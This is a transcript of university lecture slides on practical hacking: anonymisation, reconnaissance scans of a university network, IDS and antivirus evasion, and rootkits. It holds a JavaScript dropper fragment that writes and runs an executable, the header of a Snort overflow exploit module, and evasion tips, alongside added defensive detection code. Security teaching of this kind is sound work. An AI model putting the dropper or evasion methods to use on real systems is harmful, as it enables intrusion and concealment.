IT Architecture and Security: Practical Hacking

Presentation transcript:

IT Architecture and Security: Practical Hacking

Practical hacking: Contents
- Obfuscation
- Reconnaissance
- Exploits / vulnerabilities
- Compromise
- Covering the intrusion
- Extraction of information
- Consolidation of access

Overall process
Targeted hackers: find target machines, find exploits, hack the machines.
Hobby hackers, or hackers who use hacked machines as a platform (e.g. for spam or extortion): find any machines, find exploits, hack the machines.

Practical hacking: Obfuscation
To avoid revealing one's point of origin, and thereby oneself, intermediate stations are typically used:
- Proxies
- Open access points (wifi)
- Anonymising networks (tor, hushmail)
- Hacked computers

Practical hacking (obfuscation): Proxies

Practical hacking (obfuscation): Open access points

Practical hacking (obfuscation): Tor

Practical hacking: Reconnaissance
There are several different ways to find one's targets:
- Public information (netcraft, google hacking, dns, ripe)
- Active (nmap, nessus)
- Passive (wireless sniffing)

Practical hacking (reconnaissance): RIPE lookup

```
$ host  is an alias for tintin.itu.dk.
tintin.itu.dk has address
bin/whois?searchtext= &submit=Search:
inetnum:
netname:  FSKNET
descr:    Danish Network for Research and Education
descr:    UNI-C
descr:    DK-2800 Lyngby
country:  DK
admin-c:  unic1-ripe
tech-c:   unic1-ripe
status:   ASSIGNED PA
remarks:  Details of IP-adresses of selected institutions are
remarks:  available at
```

ITU: IT-Højskolen i København (the IT University of Copenhagen)

Practical hacking (reconnaissance): DNS lookup

```
$ host -l itu.dk ns.itu.dk
…
videokonf.itu.dk has address
vpn.itu.dk has address
vpnpriv.itu.dk has address
webcal.itu.dk is an alias for tintin.itu.dk.
webfaktura.itu.dk is an alias for tintin.itu.dk.
webmail.itu.dk is an alias for pluto.itu.dk.
whaddayouthinkyouredoingyoubastard.itu.dk has address
wolverine.itu.dk has address
 is an alias for tintin.itu.dk.
www1.itu.dk has address
wwwadm.itu.dk is an alias for ssh.itu.dk.
xcvs.itu.dk has address
ypserver.itu.dk is an alias for asterix.itu.dk.
itu.dk SOA ns.itu.dk. hostmaster.itu.dk
$
```

Practical hacking (reconnaissance): Netcraft

Practical hacking (reconnaissance): Google hacking

Practical hacking (reconnaissance): nmap

```
# nmap -sS -sV test.xxx.dk
Starting nmap 3.93 ( ) at :29 CET
Interesting ports on :
(The 1662 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 3.9p1 Debian-1ubuntu2 (protocol 2.0)
25/tcp   open  smtp    Postfix smtpd
80/tcp   open  http    Apache httpd ((Ubuntu) PHP/ ubuntu4.1)
143/tcp  open  imap    Courier Imapd (released 2004)
993/tcp  open  ssl     OpenSSL
3306/tcp open  mysql   MySQL _Debian-3ubuntu2.1-log
MAC Address: 00:80:AD:00:49:9E (Cnet Technology)
Service Info: Host: mail.rhave.dk
Nmap finished: 1 IP address (1 host up) scanned in  seconds
```
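The same scan output is what a defender should be producing against their own perimeter. As an added example (not part of the original slides), this Python parses the `nmap -sV` port table above into a service inventory and checks it against a hypothetical exposure policy; the IP address is a documentation placeholder because the transcript does not preserve it.

```python
import re
from typing import Dict, List, NamedTuple

# Constructed sample: the 'nmap -sS -sV' port table from the slide, re-typed.
# 192.0.2.10 is a placeholder for the address missing from the transcript.
SAMPLE_NMAP = """\
# nmap -sS -sV test.xxx.dk
Interesting ports on 192.0.2.10:
(The 1662 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 3.9p1 Debian-1ubuntu2 (protocol 2.0)
25/tcp   open  smtp    Postfix smtpd
80/tcp   open  http    Apache httpd ((Ubuntu) PHP/ ubuntu4.1)
143/tcp  open  imap    Courier Imapd (released 2004)
993/tcp  open  ssl     OpenSSL
3306/tcp open  mysql   MySQL _Debian-3ubuntu2.1-log
MAC Address: 00:80:AD:00:49:9E (Cnet Technology)
Service Info: Host: mail.rhave.dk
"""

class Service(NamedTuple):
    port: int
    proto: str
    state: str
    name: str
    version: str

# One port-table row: "<port>/<proto> <state> <service> [<version banner>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text: str) -> List[Service]:
    """Extract the port table rows; header, banner and summary lines are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            services.append(Service(int(m.group(1)), m.group(2), m.group(3),
                                    m.group(4), m.group(5).strip()))
    return services

# Hypothetical exposure policy for an Internet-facing mail/web host: only these
# port/protocol pairs are approved to be reachable from outside.
APPROVED = {(22, "tcp"), (25, "tcp"), (80, "tcp"), (143, "tcp"), (993, "tcp")}

def unapproved_exposure(services: List[Service], approved=APPROVED) -> List[Service]:
    """Open ports that the policy does not allow to be reachable externally."""
    return [s for s in services if s.state == "open" and (s.port, s.proto) not in approved]

def version_inventory(services: List[Service]) -> Dict[str, str]:
    """Map service name to its banner, for comparison against the advisory
    sources the deck lists later (secunia, securityfocus, frsirt)."""
    return {s.name: s.version for s in services if s.state == "open"}
```

On the slide's host the check would single out MySQL on 3306/tcp, a database port that rarely needs to face the Internet.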

Practical hacking (reconnaissance): nmap ping-sweep

```
# nmap -sP /23
Starting nmap 3.75 ( ) at :49 CET
Host  seems to be a subnet broadcast address (returned 1 extra pings).
Host  appears to be up.
Host rogue.itu.dk ( ) appears to be up.
Host ns2.itu.dk ( ) appears to be up.
Host tarzan.itu.dk ( ) appears to be up.
Host superman.itu.dk ( ) appears to be up.
Host tintin.itu.dk ( ) appears to be up.
Host hulk.itu.dk ( ) appears to be up.
Host hydra.itu.dk ( ) appears to be up.
Host  appears to be up.
Host  appears to be up.
Host r2d2.linuxlab.dk ( ) appears to be up.
Host c3po.linuxlab.dk ( ) appears to be up.
Host nightcrawler.itu.dk ( ) appears to be up.
Host vpnpriv.itu.dk ( ) appears to be up.
Host wolverine.itu.dk ( ) appears to be up.
Host pluto.itu.dk ( ) appears to be up.
Host  appears to be up.
Host  seems to be a subnet broadcast address (returned 1 extra pings).
Host  appears to be up.
```

Practical hacking (reconnaissance): nmap ping-sweep (continued)

```
Host dkm.itu.dk ( ) appears to be up.
Host sigchi.itu.dk ( ) appears to be up.
Host dialogical.itu.dk ( ) appears to be up.
Host hug.itu.dk ( ) appears to be up.
Host doi.itu.dk ( ) appears to be up.
Host ds.itu.dk ( ) appears to be up.
Host abs.itu.dk ( ) appears to be up.
Host gamestudies.itu.dk ( ) appears to be up.
Host hit.itu.dk ( ) appears to be up.
Host battlefield.itu.dk ( ) appears to be up.
Host rmj1.itu.dk ( ) appears to be up.
Host colossus.itu.dk ( ) appears to be up.
Host cogain.itu.dk ( ) appears to be up.
Host xcvs.itu.dk ( ) appears to be up.
Host bigwig.itu.dk ( ) appears to be up.
Host tlb.itu.dk ( ) appears to be up.
Host ea.itu.dk ( ) appears to be up.
Host whaddayouthinkyouredoingyoubastard.itu.dk ( ) appears to be up.
Host abacus.itu.dk ( ) appears to be up.
Host bpl2.itu.dk ( ) appears to be up.
Host lacomoco.itu.dk ( ) appears to be up.
Host intifada.itu.dk ( ) appears to be up.
Host logosphere.itu.dk ( ) appears to be up.
Nmap run completed --  IP addresses (41 hosts up) scanned in  seconds
```

Practical hacking: Exploits / vulnerabilities
Sources of exploits:
- Public sites / mailing lists (frsirt.com, securityfocus.com, full-disclosure, secunia.dk)
- In-house development (hard work)

Practical hacking (exploits): Public websites

Practical hacking (exploits): Finding your own vulnerabilities
There are a number of methods for finding vulnerabilities in programs:
- Source code auditing
- Binary auditing
- Fuzzing

Practical hacking (exploits): Finding your own vulnerabilities
[Stack frame diagram: return address, saved ebp (esp) ..., local variable var_28]

Practical hacking: Compromise
- Direct attacks
  - Firewalls
  - IDS (and IPS)
- Indirect attacks against client vulnerabilities (e.g. IE exploits)
  - Personal firewalls that block outgoing traffic
  - Antivirus (pattern recognition => change the pattern)

Practical hacking (compromise): Firewalls
Firewalls are a mature technology and are very good at doing their job. On the rare occasions that something is found in modern products, it is mainly DoS attacks:
- DoS attacks
- Fragment attacks
- Flood attacks
It is typically necessary to use other attack methods (e.g. indirect attacks) if properly configured firewalls block the direct route.

Practical hacking (compromise): Intrusion Detection Systems (IDS)
The problem with an IDS is detection, but an IDS is fortunately (for the attacker) typically pattern-based, and can therefore be circumvented:
- Modification of known exploits can let them pass undetected
- Fragmentation can fool the IDS
- Bugs in the IDS can lead to crashes: send 'disable' packets before the real attack

Practical hacking (compromise): Snort

Advisory ID: FrSIRT/ADV
CVE ID: CVE
Rated as: Critical
Remotely Exploitable: Yes
Locally Exploitable: Yes
Release Date:

Technical Description
A vulnerability has been identified in Snort, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a stack overflow error in the Back Orifice pre-processor when determining the direction (to or from server) of a specially crafted UDP packet, which could be exploited by remote unauthenticated attackers to compromise a vulnerable system or network monitored by Snort.

Affected Products
Snort versions through 2.4.2

Practical hacking (compromise): Snort

Snort Back Orifice Pre-processor Remote Buffer Overflow Exploit (Win32)
Date: 25/10/2005
Advisory: FrSIRT/ADV
Rated as: Critical

```perl
###############################################
# for educational purpose only
# by Kira
###############################################
package Msf::Exploit::snort_bo_overflow_win32;
use base 'Msf::Exploit';
use strict;
use Pex::Text;

my $holdrand;
my $advanced = {};
my $info = {
    'Name'    => 'Snort Back Orifice Preprocessor Overflow',
    'Version' => '$Revision: 1.0 $',
    'Authors' => [ 'Trirat Puttaraksa (Kira) ', ],
    'OS'      => ['win32', 'win2000', 'winxp', 'win2003'],
```

Practical hacking (compromise): Personal firewalls
Typically smaller software firewalls that only protect a single machine:
- Also protect against outgoing traffic
- Mainly used only on Windows machines, which makes it easier to get data out of Linux/Unix/BSD machines
Several ways to circumvent these:
- Piggybacking on allowed programs
- Sending data from low network layers (NDIS)

Practical hacking (compromise): ZoneAlarm

ZoneAlarm Personal Firewall Program Control Feature Bypass
Secunia Advisory: SA17450
Release Date:
Critical: Not critical
Impact: Security Bypass
Where: Local system
Solution Status: Unpatched
Software: ZoneAlarm Anti-Spyware 6.x, ZoneAlarm Antivirus 6.x, ZoneAlarm Internet Security Suite 6.x, ZoneAlarm Pro 6.x

Description: Debasis Mohanty has discovered a weakness in various ZoneAlarm products, which can be exploited to bypass security features provided by the product. The weakness is caused due to the Program Control feature failing to correctly identify and stop processes that use the Internet Explorer browser to make outgoing connections via the "ShowHTMLDialog()" API in MSHTML.DLL. This may be exploited by malware to send potentially sensitive information out from an affected system.
…

Practical hacking (compromise): Antivirus
Antivirus programs typically check file access, but fortunately (for the attacker) they typically rely on pattern recognition. Even small variations can fool many AV products.

Practical hacking (compromise): Example of an AV pattern

```html
<APPLET code="com.ms.activeX.ActiveXComponent" WIDTH=0 HEIGHT=0>
<!-- hide for safe browsers
InterfaceObject=document.applets[0];
setTimeout("ownload()",5000);
function ownload() {
  fsoClassID="{0D43FE01-F093-11CF A0C }";
  InterfaceObject.setCLSID(fsoClassID);
  fso = InterfaceObject.createInstance();
  windir = fso.getspecialfolder(0);
  filename = "\\config.exe";
  if (fso.FileExists(windir+filename) == false) {
    file = fso.opentextfile(windir+filename, "2", "TRUE")
    file.write(FileContent)
    file.close()
    setTimeout("Run()",500)
  }
…
```
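The slide's point, that a literal pattern is brittle, is easiest to see from the detection side. As an added example (not part of the original slides), this Python runs two detectors over the dropper fragment above and over a constructed variant with the function renamed: a literal signature, and a rule keyed on the behaviour the script exhibits (instantiate a COM object by CLSID, resolve a system folder, reference an .exe path) rather than on names the author chose.

```python
import re

# Constructed input: the dropper fragment shown on the slide (trimmed).
SAMPLE = r'''InterfaceObject=document.applets[0];
setTimeout("ownload()",5000);
function ownload() {
fsoClassID="{0D43FE01-F093-11CF A0C }";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
windir = fso.getspecialfolder(0);
filename = "\\config.exe";
if (fso.FileExists(windir+filename) == false) {
file = fso.opentextfile(windir+filename, "2", "TRUE")
file.write(FileContent)
file.close()
setTimeout("Run()",500)
}'''

# Hypothetical variant of the same script: function renamed, delay changed.
VARIANT = SAMPLE.replace("ownload", "fetch").replace("5000", "4000")

# A literal signature of the kind a pure pattern-matching scanner might carry.
LITERAL_SIGNATURE = 'setTimeout("ownload()",5000)'

def literal_match(text: str) -> bool:
    """Exact substring match: precise, but defeated by any edit to the bytes."""
    return LITERAL_SIGNATURE in text

# Behaviour-oriented rule: all three traits must be present. Whitespace is
# stripped first so reformatting alone does not change the verdict.
BEHAVIOUR_RULES = [
    re.compile(r"\.setCLSID\(", re.I),          # COM object chosen by CLSID
    re.compile(r"\.getspecialfolder\(", re.I),  # locate the Windows directory
    re.compile(r'"[^"]*\.exe"', re.I),          # an executable path literal
]

def behaviour_match(text: str) -> bool:
    norm = re.sub(r"\s+", "", text)
    return all(rule.search(norm) for rule in BEHAVIOUR_RULES)

def classify(text: str) -> dict:
    """Verdict of both detectors side by side for one input."""
    return {"literal": literal_match(text), "behaviour": behaviour_match(text)}
```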

Practical hacking: Rootkits
After a compromise one typically needs a base on the hacked machine from which to carry out further work. A rootkit is typically used for this. Basically it is just a technology whose purpose is to hide an attacker's tools.
Examples:
- FU_rootkit (Windows, rootkit.com)
- t0rn (Linux)

Practical hacking (rootkits): Covering the intrusion
Rootkits are used, among other things, to hide:
- files / folders
- network connections
- processes
- log entries

Windows architecture (diagram)
User mode: system processes (Session Manager, Winlogon, Services.exe, LSASS), services (Service Control Manager), applications (Explorer, Task Manager, user applications); NTDLL.DLL sits between them and the kernel-mode callable interfaces. User-mode rootkits hook NTDLL.DLL.
Kernel mode: Security Reference Monitor, Processes & Threads, Config Manager (registry), I/O Manager, device & file system drivers, Kernel, Hardware Abstraction Layer. Kernel-mode rootkits hook the Kernel.

Practical hacking (rootkits): t0rn
"The t0rn rootkit replaces several binaries on the system in order to hide itself. Here are the binaries that it replaces:
- du
- find
- ifconfig
- in.telnetd
- in.fingerd
- login
- ls
- mjy
- netstat
- ps
- pstree
- top
A setuid shell is placed in /usr/man/man1/man1/lib/.lib/.x"
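Because t0rn works by swapping system binaries, the classic countermeasure is an integrity baseline taken before compromise and kept off the host. As an added example (not part of the original slides), this Python hashes the binaries the slide lists, reports which ones changed or vanished, and walks the tree for setuid files such as the shell t0rn drops under /usr/man/.../.lib/.x; the demo builds a throwaway directory tree rather than touching a real system.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List

# Binaries the slide says t0rn replaces (names only; on a real host these are
# resolved to /bin, /sbin, /usr/bin, ... from a known-good package manifest).
T0RN_TARGETS = ["du", "find", "ifconfig", "in.telnetd", "in.fingerd", "login",
                "ls", "mjy", "netstat", "ps", "pstree", "top"]

def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_baseline(root: Path, names: List[str]) -> Dict[str, str]:
    """Hash the monitored binaries on a known-good system. Keep the result
    off-host: a rootkit that can swap 'ls' can also rewrite a local manifest."""
    return {n: sha256_of(root / n) for n in names if (root / n).exists()}

def verify(root: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Report binaries whose hash changed or which disappeared."""
    report: Dict[str, List[str]] = {"modified": [], "missing": []}
    for name, expected in baseline.items():
        p = root / name
        if not p.exists():
            report["missing"].append(name)
        elif sha256_of(p) != expected:
            report["modified"].append(name)
    return report

def find_setuid(root: Path) -> List[str]:
    """Walk a tree for setuid regular files, dot-directories included, which
    is where the slide says t0rn parks its shell."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            p = Path(dirpath) / f
            st = p.lstat()  # lstat: do not follow symlinks planted as decoys
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(p.relative_to(root).as_posix())
    return sorted(hits)

def demo() -> Dict[str, List[str]]:
    """Constructed scenario in a temp dir: baseline a fake bin/, then trojan
    ps, remove netstat and plant a setuid file at t0rn's hiding path."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        binroot = root / "bin"
        binroot.mkdir()
        for n in T0RN_TARGETS:
            (binroot / n).write_bytes(b"#!/bin/sh\necho original " + n.encode() + b"\n")
        baseline = build_baseline(binroot, T0RN_TARGETS)
        (binroot / "ps").write_bytes(b"#!/bin/sh\n# trojaned: filters attacker pids\n")
        (binroot / "netstat").unlink()
        hidden = root / "usr/man/man1/man1/lib/.lib/.x"
        hidden.parent.mkdir(parents=True)
        hidden.write_bytes(b"\x7fELF")
        hidden.chmod(0o4755)
        result = verify(binroot, baseline)
        result["setuid"] = find_setuid(root)
        return result
```

A trojaned `ls` or `find` would hide the dropped shell from an interactive shell, which is why the scan uses `os.walk` and `lstat` directly rather than shelling out to those binaries.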

Practical hacking (rootkits): Sony rootkit
"I studied the driver's initialization function, confirmed that it patches several functions via the system call table and saw that its cloaking code hides any file, directory, Registry key or process whose name begins with "$sys$"." - Mark's Sysinternals Blog

€45

Practical hacking (rootkits): Extraction of information
- Documents
- Logs
- Saved passwords
- Mails
- …

Practical hacking (rootkits): Consolidation of access
- Installation of backdoors
- Rootkits

Practical hacking (rootkits): Further use of the machines
- Spam / open relays
- Proxy
- DDoS
- Distributed computations

Practical hacking: Example of a botnet

Phpbb include vuln scanning, via Google, generating new IRC botnet (NEW)
Published / last updated by Patrick Nolan (Version: 3)

We have received two reports of systems being exploited via a phpbb include vulnerability and a "new" IRC bot is installed. Please update your files now. Phpbb forum support guru "Techie-Micheal" points out that "running update_to_latest.php on their install only updates the database (and is clearly stated in the documentation), files need to be updated separately for which there are several methods". The scanning is for phpbb versions and under. The latest version of phpbb is . Micheal also notes "In past bots, the bots would run as an "SSL'ed Apache". This one is a bit different; my $processo = '/usr/local/firewall'". The new IRC bot scans for vulnerable systems using Google, when successful it announces that "oopz and sirh0t and Aleks g0t pwned u!", and has UDP flooding and UDP/ICMP/TCP scanning capabilities.

Practical hacking: Variations
- Hacking via physical access
- …

And then… on to the group work